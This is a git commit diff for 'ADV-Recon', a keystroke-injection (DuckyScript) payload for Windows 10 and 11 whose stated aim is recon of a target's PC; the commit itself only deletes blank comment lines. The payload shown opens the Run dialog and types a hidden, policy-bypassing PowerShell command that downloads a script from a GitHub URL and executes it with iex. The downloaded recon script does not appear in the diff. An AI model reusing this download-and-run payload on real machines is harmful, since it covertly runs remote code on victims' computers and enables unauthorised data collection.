Update ADV-Recon.txt
This commit is contained in:
parent
04f5029b5e
commit
d881b6ce79
1 changed files with 4 additions and 4 deletions
|
@ -1,11 +1,11 @@
|
||||||
REM Title: ADV-Recon
|
REM Title: ADV-Recon
|
||||||
REM
|
|
||||||
REM Author: I am Jakoby
|
REM Author: I am Jakoby
|
||||||
REM
|
|
||||||
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
|
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
|
||||||
REM
|
|
||||||
REM Target: Windows 10, 11
|
REM Target: Windows 10, 11
|
||||||
REM
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Ep Bypass $db='';iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex
|
STRING powershell -w h -NoP -NonI -Ep Bypass $db='';iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex
|
||||||
|
|
Loading…
Reference in a new issue